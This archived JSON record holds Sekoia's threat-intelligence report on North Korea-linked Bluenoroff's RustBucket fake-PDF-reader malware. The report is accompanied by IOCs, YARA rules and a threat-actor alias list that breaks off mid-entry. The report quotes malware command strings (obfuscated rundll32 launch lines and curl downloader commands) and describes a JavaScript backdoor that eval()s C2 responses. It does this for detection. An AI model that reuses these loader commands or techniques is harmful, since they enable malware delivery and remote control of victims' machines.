{
	"id": "44337c51-f95d-440c-9faa-962633f262a9",
	"created_at": "2026-04-06T00:17:03.643232Z",
	"updated_at": "2026-04-10T03:38:06.551948Z",
	"deleted_at": null,
	"sha1_hash": "f5a3423d495388aadb8cb22e1e044a2042f956db",
	"title": "Bluenoroff’s RustBucket campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1575894,
	"plain_text": "Bluenoroff’s RustBucket campaign\r\nBy Sekoia TDR\r\nPublished: 2023-05-22 · Archived: 2026-04-05 19:28:10 UTC\r\nLike DPRK soldiers\r\nIn April 2023, fellow security researchers at Jamf published a report on Bluenoroff’s RustBucket, a newly observed malware targeting the macOS platform. Sekoia.io analysts further investigated Bluenoroff’s infrastructure and share their findings in this report.\r\nBluenoroff is a North Korea-nexus intrusion set, allegedly subordinated to RGB’s Bureau 121 and tasked with revenue generation since at least 2015. Since 2017, Bluenoroff was observed conducting financially driven campaigns targeting cryptocurrency exchanges and venture capital-related entities in Europe, Asia, the U.S. and the UAE.\r\nFrom the end of 2021 through 2022, Bluenoroff continuously used the same TTPs. However, Sekoia.io analysts observed recent modifications, as described in the Jamf report referenced above.\r\nBluenoroff’s gone macOS\r\nSince at least December 2022, Bluenoroff was observed leveraging RustBucket, a malware written in Rust and Objective-C that targets systems running macOS. This recent Bluenoroff activity illustrates how intrusion sets turn to cross-platform languages in their malware development efforts, further expanding their capabilities, highly likely to broaden their victimology. While other DPRK-nexus intrusion sets, including Lazarus, Kimsuky and more recently Reaper, were already reported targeting macOS, it is the first time Bluenoroff was observed targeting macOS users, to the best of our knowledge.\r\nThe RustBucket infection chain consists of a macOS installer that installs a backdoored, yet functional, PDF reader. The fake PDF reader then requires opening a specific PDF file that operates as a key to trigger the malicious activity.\r\nWhen opened in a classical PDF reader, the PDF document displays a message asking the user to open the document in the proper reader (i.e. the backdoored one). When opened in this reader, the PDF displays a nine-page document about a venture capital company that appears to be the printout of a legitimate company’s website. The fake PDF reader uses a hardcoded 100-byte XOR key to decrypt the new content of the document and the C2 server configuration.\r\nhttps://blog.sekoia.io/bluenoroffs-rustbucket-campaign/\r\nPage 1 of 13\n\nFigure 1. Key PDF document when opened in a PDF Reader\r\nWhen the proper PDF file is submitted to the fake PDF reader, it contacts the C2 server encoded in the PDF file using an HTTP POST request to download and execute a new payload. The new payload is the backdoor component of the RustBucket kill chain, collecting information about the compromised system, sending it to its C2 server and requesting commands.\r\nThis new technique is interesting as it makes the activity more complex to track: we need to find both the fake readers and the right PDF file to get relevant results from sandboxes. While the usage of a modified PDF reader was already observed during Lazarus’ DreamJob campaign in 2020, it is the first time we observe it targeting macOS. Sekoia.io analysts created YARA rules and collected new samples complementing Jamf’s findings, available in the IOCs section.\r\nLooking through the Window(s) pane\r\nDuring our investigation of the macOS variant, Sekoia.io analysts identified a .NET version of RustBucket, with a similar GUI, developed using the library DevExpress.XtraPdfViewer. The malware was embedded in a ZIP archive containing the PDF reader and the “key” PDF requiring user interaction.\r\nFigure 2. Windows RustBucket archive’s content\r\nSimilarly to the RustBucket macOS version, when the user opens the PDF file in another PDF reader, it opens a one-pager with a message stating the file is protected and must be opened with the “internal” reader. When the file is opened with the fake PDF reader, it displays a sixteen-page document containing a list of contacts.\r\nFigure 3. (left) Key PDF document opened in Firefox, (right) Key PDF document opened in the Internal PDF viewer\r\nDuring our analysis, we observed that both the Windows and macOS versions of RustBucket use the same decryption key. The executable PdfViewer.exe decrypts the malicious PDF and calls the Create function of the DevExpress.Xpo.v19.2.dll library with the C2 URL as parameter (if a legitimate PDF is chosen, the error \"Can’t decrypt PDF file\" is returned). Two other DLLs are then used to load the backdoor, as detailed below and in Figure 4.\r\nPdfViewer/DevExpress.Xpo.v19.2.dll\r\nThe purpose of this DLL is to retrieve the process ID of an explorer.exe process. Then, the Create function of the DevExpress.XtraList.v19.2.dll library is called with the URL and the process ID as parameters.\r\nPdfViewer/DevExpress.XtraList.v19.2.dll\r\nThe purpose of this DLL is to load and call the DevExpress.Xpr.v19.2.dll library. This DLL checks for some antivirus products on the infected machine: Bitdefender, Kaspersky, Sophos, AvastSvc, Norton, Avira, AVG and WindowsDefender. If one of these antivirus products is found, the DLL calls the OpenProcess API to run the following command:\r\nrundll32.exe %s\\DevExpress.Xpr.v19.2.dll,Update\r\nIf there is no antivirus, the DLL performs code injection into the provided explorer.exe process. The injected payload starts by decrypting itself into DevExpress.Xpr.v19.2.dll.\r\nDevExpress.Xpr.v19.2.dll\r\nThis DLL is called via the Update function, which gives the execution flow back to the DllMain function with 0xD8E1 as reason code (instead of 0, 1, 2 or 3). Then a new thread is created. This backdoor collects information about the compromised machine (name, active processes, network configuration, etc.) and sends this information to the C2 using POST requests. It also has the capability to load a next stage (we assess that this next stage is provided by the C2).\r\nFigure 4. Windows RustBucket execution flow chart\r\nPivoting on the infrastructure\r\nPivoting on the infrastructure used to deliver RustBucket, Sekoia.io analysts retrieved additional infrastructure not exclusively related to the RustBucket activity, which we associate with Bluenoroff with high confidence, used to deploy other malware through several infection chains. These infection chains notably include LNK, MSI, OneNote and VHD files. It is possible Bluenoroff is testing new infection chains and malware before shifting or expanding their TTPs.\r\nBluenoroff’s observed initial intrusion vectors include phishing emails, as well as leveraging social networks such as LinkedIn. During our investigations, we identified the domain sarahbeery.docsend[.]me; further analysis led us to the following LinkedIn profile:\r\nFigure 5. LinkedIn profile allegedly used by Bluenoroff\r\nAs of the time of writing, TDR analysts could no longer find this profile on LinkedIn. We assess this likely was a profile used by Bluenoroff, after it was leaked, to engage with their targets, possibly followed up by a delivery of malicious documents through the docsend sharing platform.\r\nWhile Bluenoroff was seen leveraging updated VHD and CAB files to bypass the Mark-of-the-Web (MOTW) flag until the end of 2022, Sekoia.io did not observe these TTPs in 2023. It is almost certainly a reflection of Bluenoroff’s adaptation efforts after their TTPs were documented in open source, notably by Securelist. In March 2023, we observed new files (MSI file: 5c483473641807082e530744023044fd and OneNote file: 4e05597d308d2368625dc19e86a9ca22) containing commands similar to those used in the VHD files reported by Kaspersky.\r\nThose files were used to drop and execute 529c65521e8a07c8810b6d225f7e2a89, which is a downloader for a curl-agent that Sekoia.io analysts had not retrieved at the time of writing.\r\ncmd.exe /c copy /b %s\\system32\\rund^ll3^2.e^xe %s\\rdl.e^xe \u0026 %s\\rdl.ex^e %s #1 %S\r\ncmd /c timeout /t 10 \u0026 Del /f /q \"%s\" \u0026 attrib -s -h \"%s\" \u0026 rundll32 \"%s\" #1 %S\r\ncmd /c timeout /t 10 \u0026 rundll32 \"%s\" #1 %S\r\ncurl -A cur1-agent -L %s -s -d da\r\ncurl -A cur1-agent -L %s -s -d dl\r\nAs per Sekoia.io analysts’ observations, the network infrastructure is used to host HTTP/HTTPS services leveraged by lure files. This infrastructure is used to download a later-stage malware, which often is a VBS acting as a backdoor, or a curl-agent downloader. During their investigation, Sekoia.io analysts created automatic trackers to monitor the evolution of Bluenoroff’s infrastructure. In previous activities, the intrusion set set up HTTP/HTTPS servers with specific characteristics used to host a dozen domains, notably typosquatting IT, financial and investment companies.\r\nBased on a TDR heuristic, we identified servers used to host domains typosquatting legitimate organisations, notably pertaining to entities involved in fund management and venture funds, crypto assets and blockchain, located in Europe, Asia, and North America.\r\nFigure 6. Financial and technology entities typo-squatted by Bluenoroff\r\nBased on previous open source publications and our own knowledge of this intrusion set, we associate these domains with Bluenoroff with high confidence. A list of retrieved typosquatting domains is available to Sekoia.io’s customers in the Intelligence Center.\r\nWhether Bluenoroff attempted to target these entities or simply masqueraded as those entities to target other individuals and/or organizations remains an intelligence gap at the time of writing. Regardless, Sekoia.io TDR analysts assess this is in line with Bluenoroff’s past activities targeting finance-related institutions. Based on typosquatting domains and Sekoia.io’s attributed levels of confidence, we identified a strong focus on Asia and the U.S. While this almost certainly stems from the fact that these regions are particularly active in the Fintech area, it is also likely part of Bluenoroff’s geographical targeting assignment. We also retrieved domains indicating a targeting of Laos and Thailand.\r\nFigure 7. Bluenoroff targets since September 2022\r\nOf note, we also observed that the group may use temporary C2 servers when testing new techniques, which they then discard rapidly. For instance, in November 2022, Bluenoroff temporarily used a server (149.28.247[.]34) to transition to using MSI and CAB files. Similarly, the intrusion set sporadically used a specific server (172.86.122[.]181) when experimenting with CHM (Windows Help) files in December 2022.\r\nConclusion\r\nSekoia.io analysts assess this activity is part of Bluenoroff’s SnatchCrypto campaign, active since 2017. It is in line with past observed malicious cyber activities, notably pertaining to Pyongyang’s strategic objective of revenue generation to evade sanctions. Of particular interest are Bluenoroff’s observed efforts to develop their offensive capabilities, notably by adding cross-platform languages to their toolset, and to expand their victimology through the targeting of multiple environments. Sekoia.io analysts assess Bluenoroff’s activities will almost certainly continue in the short to medium term.\r\nIoCs \u0026 Technical Details\r\nSamples’ first seen date relates to the time they were first submitted to VirusTotal. Of note, a few samples we identified were tagged as NukeSped in open source, likely due to the confusion between Lazarus and Bluenoroff activities. At the time of writing, Sekoia.io analysts consider NukeSped to be a Lazarus signature malware. IOCs provided in the Appendix are all associated with Bluenoroff with high confidence.\r\nRustBucket macOS version\r\n2023-05-08\r\nJump Crypto Investment Agreement.zip\r\nba5e982596fd03bea98f5de96c1258e56327358e134ceecd1d68e54480533d92\r\nInternal PDF Viewer.app.zip\r\n3ed9f34fedca38130776e5adabae363ac797fe89087e04e0c93d83fd62a7a9a4\r\nZIP\r\n6ca3a2f4cef27dac9d28c1ec2b29a8fa09dfc6dbbaf58e00dddbf5c1dd3b3cc3\r\nMach-O - Internal PDF Viewer\r\nc28e4031129f3e6e5c6fbd7b1cebd8dd21b6f87a8564b0fb9ee741a9b8bc0197\r\nMach-O\r\ne2f177b8806923f21a93952b61aedbeb02d829a67a820a7aab5ee72512e3d646\r\nMach-O\r\nd6d367453c513445313be7339666e4faeeebeae71620c187012ea5ae2901df34\r\nPDF - Jump Crypto Investment Agreement.pdf (Key PDF)\r\n5f00106f7f15e0ca00df4dbb0eeccd57930b4b81bc9aa3fca0c5af4eda339ab7\r\nPDF - Readme.pdf (Instruction to use the fake reader)\r\nebad7317e1b01c2231bdbf37dfebdf656e3c8706e719fd37b66f0170b3d5cae0\r\n2023-05-02\r\nZIP - Internal PDF Viewer.app.zip\r\ndda8a9e2a2e415be781a39fdf41f1551af2344f1b1a0ddf921d8aeba90343d1b\r\nMach-O - Internal PDF Viewer\r\n46db9f2fc879bf643a8f05e2b35879b235cbb04aa06fe548f0bc7c7c02483cf3\r\nMach-O\r\n5072b28399c874f92e71793fa13207d946a28a2f5903365ac11ddf666d15d086\r\nMach-O\r\n3f0d5ddca2657044f4763ae53c4f33c8a7814ba451b60d24430a126674125624\r\n2023-04-23\r\nZIP - Internal PDF Viewer 2.app.zip\r\n61772375af1884fe73c5d154b8637dd62f26d23bc38d18462a88e2bbed483fd7\r\nSCPT - main.scpt\r\n7c66d2d75be43d2c17e75d37c39344a9b5d29ee5c5861f178aa7d9f34208eb48\r\ncloud.dnx[.]capital\r\n104.255.172[.]56\r\nZIP - Internal PDF Viewer.zip\r\nff8832355ae99ffd66d0fe9eda2d74efdf3ed87bb2a4c215b93ade93165f7c0b\r\nZIP - Internal PDF Viewer.app.zip\r\n83f457bc81514ec5e3ea123fc237811a36da6ce7f975ad56d62e34af4d1f37c0\r\nZIP - Internal PDF Viewer 3.app.zip\r\nb68bf400a23b1053f54911a2b826d341f6bf87c26bea5e6cf21710ee569a7aab\r\nMach-O - PdfWriter\r\n3b6f30369a4ee8bf9409d141b6d1b3fb4286c34984b5de005ed7431df549b17e\r\nlaos.hedgehogvc[.]us\r\n104.255.172[.]56\r\n2023-04-21\r\nMach-O - 703517604263\r\n9ca914b1cfa8c0ba021b9e00bda71f36cad132f27cf16bda6d937badee66c747\r\nMach-O\r\nec8f97d5595d92ec678ffbf5ae1f60ce90e620088927f751c76935c46aa7dc41\r\nMach-O\r\n7fccc871c889a4f4c13a977fdd5f062d6de23c3ffd27e72661c986fae6370387\r\n2023-03-02\r\nZIP - Internal PDF Viewer.app.zip\r\nb448381f244dc0072abd4f52e01ca93efaebb2c0a8ea8901c4725ecb1b2b0656\r\nZIP - Pdf Viewer.zip\r\nc56a97efd6d3470e14193ac9e194fa46d495e3dddc918219cca530b90f01d11e\r\nMach-O - Internal PDF Viewer\r\nbea33fb3205319868784c028418411ee796d6ee3dfe9309f143e7e8106116a49\r\n2023-02-13 (creation date 2022-12-20)\r\nZIP - Pdf Viewer.zip\r\n0d6964fe763c2e6404cde68af2c5f86d34cf50a88bd81bc06bba739010821db0\r\nZIP - Internal PDF Viewer.app.zip\r\nea5fac3201a09c3c5c3701723ea9a5fec8bbc4f1f236463d651303f40a245452\r\nZIP - Internal PDF Viewer.app.zip\r\n9525f5081a5a7ab7d35cf2fb2d7524e0777e37fe3df62730e1e7de50506850f7\r\nMach-O - Internal PDF Viewer\r\ne74e8cdf887ae2de25590c55cb52dad66f0135ad4a1df224155f772554ea970c\r\nMach-O\r\n38106b043ede31a66596299f17254d3f23cbe1f983674bf9ead5006e0f0bf880\r\nMach-O\r\n7981ebf35b5eff8be2f3849c8f3085b9cec10d9759ff4d3afd46990520de0407\r\nWindows version of RustBucket\r\nZIP - PdfViewer.zip\r\n62a5c6a600051bca4f7b3d11508ca1f968006b71089c71bf87b83ea8b34188e3\r\nPDF - DOJ Report on Bizlato Investigation.pdf\r\n8e234482db790fa0a3d2bf5f7084ec4cfb74bffd5f6cbdc5abdbc1350f58e3fe\r\nDLL - DevExpress.Xpr.v19.2.dll\r\nf603713bffb9e040bedfd0bb675ff5a6b3205d8bd4e1a3309ea6d1b608871184\r\nDLL - DevExpress.XtraList.v19.2.dll\r\n31cec2803bfc7750930d5864400388732a822da96c3f79c98ddee03949aa6a2d\r\nEXE - PdfViewer.exe\r\nb3cb7d0b656e8e4852def8548d2cf1edc4e64116434e1f2d9c9b150ee0f9861e\r\nsafe.doc-share[.]cloud\r\n172.93.181[.]221\r\nKey PDF file 2\r\nPDF - DOJ Report on Bizlato Investigation_asistant.pdf\r\n07d206664a8d397273e69ce37ef7cf933c22e93b62d95b673d6e835876feba06\r\nsafe.doc-share[.]cloud\r\nIP and domains\r\nActive Bluenoroff C2 servers\r\n104.156.149[.]130 (2023-04-18 - today)\r\n104.255.172[.]52 (2023-03-18 - today)\r\n104.234.147[.]28 (2023-01-21 - today)\r\n104.168.138[.]7 (2023-03-17 - today)\r\n104.168.167[.]88 (2022-10-17 - today)\r\n155.138.159[.]45 (2022-09-20 - today)\r\nInactive servers\r\n104.255.172[.]56 (2022-09-15 - 2023-04-11)\r\n172.93.181[.]221 (2022-12-28 - 2023-03-06)\r\n172.86.121[.]143 (2022-10-31 - 2022-12-21)\r\n172.86.121[.]130 (2022-10-25 - 2023-01-24)\r\n149.28.247[.]34 (2022-11-11 - 2022-11-11)\r\n152.89.247[.]87 (2022-09-15 - 2022-10-24)\r\n104.168.174[.]80 (2022-06-28 - 2022-09-16)\r\n149.248.52[.]31 (2022-08-05 - 2022-08-31)\r\n155.138.219[.]140 (2022-07-17 - 2022-08-16)\r\nYARA rules\r\nrule apt_Bluenoroff_downloader_mac_RustBucket {\r\n    meta:\r\n        id = \"5a003b68-ad9a-47f9-b157-dd898181dac2\"\r\n        version = \"1.0\"\r\n        malware = \"RustBucket\"\r\n        description = \"RustBucket fake PDF reader\"\r\n        source = \"SEKOIA\"\r\n        creation_date = \"2023-04-24\"\r\n        classification = \"TLP:WHITE\"\r\n        reference = \"https://tinyurl.com/5n7f56a8\"\r\n        hash = \"606bce13161693844b9eb36c96554883\"\r\n        hash = \"b93d7b7b30207249c1c683df16bad107\"\r\n        hash = \"ca86579220eecfaede268d1520d07fae\"\r\n        hash = \"f8800dd176487601ccf2e27c094b297b\"\r\n    strings:\r\n        $down_exec1 = \"_down_update_run\" nocase\r\n        $down_exec2 = \"downAndExec\" nocase\r\n        $encrypt1 = \"_encrypt_pdf\"\r\n        $encrypt2 = \"_encrypt_data\"\r\n        $error_msg1 = \"_alertErr\"\r\n        $error_msg2 = \"_show_error_msg\"\r\n        $view_pdf1 = \"-[PEPWindow view_pdf:]\"\r\n        $view_pdf2 = \"-[PEPWindow viewPDF:]\"\r\n    condition:\r\n        (uint32be(0) == 0xcafebabe or uint32be(0) == 0xcffaedfe)\r\n        and 5 of them\r\n        and filesize \u003e 50KB\r\n}\r\nrule apt_Bluenoroff_implant_mac_RustBucket: TESTING {\r\n    meta:\r\n        id = \"fcbb745d-7f56-4c51-9db5-427da22a0c68\"\r\n        version = \"1.0\"\r\n        malware = \"RustBucket\"\r\n        description = \"Detect the RustBucket malware\"\r\n        source = \"SEKOIA\"\r\n        creation_date = \"2023-04-24\"\r\n        classification = \"TLP:WHITE\"\r\n        hash = \"f90b544f89cfbe38aee18024d7c39e40\"\r\n        reference = \"https://tinyurl.com/5n7f56a8\"\r\n    strings:\r\n        $ = \"/Users/hero/\"\r\n        $ = \"PATHIpv6Ipv4Bodyslotpath\"\r\n    condition:\r\n        (uint32be(0) == 0xcafebabe or uint32be(0) == 0xcffaedfe) and all of them\r\n}\r\nrule apt_Bluenoroff_downloader_win_curl_agent: TESTING {\r\n    meta:\r\n        id = \"ddeb2d8f-1b10-4a33-b768-d19412e8551a\"\r\n        version = \"1.0\"\r\n        intrusion_set = \"Bluenoroff\"\r\n        description = \"Detect the downloader used by Bluenoroff to install its CurlAgent\"\r\n        source = \"SEKOIA\"\r\n        creation_date = \"2023-05-02\"\r\n        classification = \"TLP:WHITE\"\r\n    strings:\r\n        $ = \"%s\\\\marcoor.dll\" wide\r\n        $ = \"curl -A cur1-agent -L %s -s -d dl\"\r\n        $ = \"curl -A cur1-agent -L %s -s -d da\"\r\n        $ = \"cmd /c timeout /t 10 \u0026 rundll32 \\\"%s\\\" #1\" wide\r\n        $ = \"cmd /c timeout /t 10 \u0026 Del /f /q \\\"%s\\\" \u0026 attrib -s -h \\\"%s\\\" \u0026 rundll32 \\\"%s\\\" #1\" wide\r\n    condition:\r\n        3 of them\r\n}\r\nAppendix 1. Bluenoroff’s infection chain.\r\nThe classical infection chain observed is ZIP \u003e LNK \u0026 PDF\r\nAs part of their phishing activities, Bluenoroff’s operators send their targets a ZIP archive. The archive contains a non-malicious PDF document and a LNK file masquerading as a TXT file purportedly containing a password to read the PDF, or masquerading as a PDF reader. Launching the LNK file results in downloading a JavaScript file from a Bluenoroff-controlled C2 server and executing it using mshta.exe. The downloaded file is an obfuscated JavaScript:\r\n5ca7c871dfe24b27b5cf7e9bf087f44c7620d78a1d4fa76373f22abedbdf8f82\r\nThe obfuscation method is straightforward and consists in encoding some characters in UTF-8 and hex. This script decodes its base64 block, writes it to a file \"tyrbz.js\" and runs it with a command line containing the C2 domain as argument. The decoded script requests the domain using an HTTP POST request, decodes the base64-encoded response and executes it using eval(). The script attempts to contact the C2 server every 15 seconds and acts as a backdoor, allowing the attacker to send commands and scripts to be executed. While we identified a few changes in 2023, this infection chain remains the most frequently observed.\r\nThank you for reading this blogpost. Feel free to share your feedback, and read other TDR reports here:\r\nTDR is the Sekoia Threat Detection \u0026 Research team. Created in 2020, TDR provides exclusive Threat Intelligence, including fresh and contextualised IOCs and threat reports for the Sekoia SOC Platform. TDR is also responsible for producing detection materials through a built-in Sigma, Sigma Correlation and Anomaly rules catalogue. TDR is a team of multidisciplinary and passionate cybersecurity experts, including security researchers, detection engineers, reverse engineers, and technical and strategic threat intelligence analysts. Threat Intelligence analysts and researchers look at state-sponsored \u0026 cybercrime threats from a strategic to a technical perspective to track, hunt and detect adversaries. Detection engineers focus on creating and maintaining high-quality detection rules to detect the TTPs most widely exploited by adversaries. TDR experts regularly share their analysis and discoveries with the community through our research blog, GitHub repository or X / Twitter account. You may also come across some of our analysts and experts at international conferences (such as BotConf, Virus Bulletin, CoRIIN and many others), where they present the results of their research work and investigations.\r\nSource: https://blog.sekoia.io/bluenoroffs-rustbucket-campaign/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://blog.sekoia.io/bluenoroffs-rustbucket-campaign/"
	],
	"report_names": [
		"bluenoroffs-rustbucket-campaign"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operaton Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0",
			"created_at": "2022-10-25T15:50:23.240383Z",
			"updated_at": "2026-04-10T02:00:05.299433Z",
			"deleted_at": null,
			"main_name": "APT38",
			"aliases": [
				"APT38",
				"NICKEL GLADSTONE",
				"BeagleBoyz",
				"Bluenoroff",
				"Stardust Chollima",
				"Sapphire Sleet",
				"COPERNICIUM"
			],
			"source_name": "MITRE:APT38",
			"tools": [
				"ECCENTRICBANDWAGON",
				"HOPLIGHT",
				"Mimikatz",
				"KillDisk",
				"DarkComet"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1bdb91cf-f1a6-4bed-8cfa-c7ea1b635ebd",
			"created_at": "2022-10-25T16:07:23.766784Z",
			"updated_at": "2026-04-10T02:00:04.7432Z",
			"deleted_at": null,
			"main_name": "Bluenoroff",
			"aliases": [
				"APT 38",
				"ATK 117",
				"Alluring Pisces",
				"Black Alicanto",
				"Bluenoroff",
				"CTG-6459",
				"Copernicium",
				"G0082",
				"Nickel Gladstone",
				"Sapphire Sleet",
				"Selective Pisces",
				"Stardust Chollima",
				"T-APT-15",
				"TA444",
				"TAG-71",
				"TEMP.Hermit"
			],
			"source_name": "ETDA:Bluenoroff",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9b02c527-5077-489e-9a80-5d88947fddab",
			"created_at": "2022-10-25T16:07:24.103499Z",
			"updated_at": "2026-04-10T02:00:04.867181Z",
			"deleted_at": null,
			"main_name": "Reaper",
			"aliases": [
				"APT 37",
				"ATK 4",
				"Cerium",
				"Crooked Pisces",
				"G0067",
				"Geumseong121",
				"Group 123",
				"ITG10",
				"InkySquid",
				"Moldy Pisces",
				"Opal Sleet",
				"Operation Are You Happy?",
				"Operation Battle Cruiser",
				"Operation Black Banner",
				"Operation Daybreak",
				"Operation Dragon messenger",
				"Operation Erebus",
				"Operation Evil New Year",
				"Operation Evil New Year 2018",
				"Operation Fractured Block",
				"Operation Fractured Statue",
				"Operation FreeMilk",
				"Operation Golden Bird",
				"Operation Golden Time",
				"Operation High Expert",
				"Operation Holiday Wiper",
				"Operation Korean Sword",
				"Operation North Korean Human Right",
				"Operation Onezero",
				"Operation Rocket Man",
				"Operation SHROUDED#SLEEP",
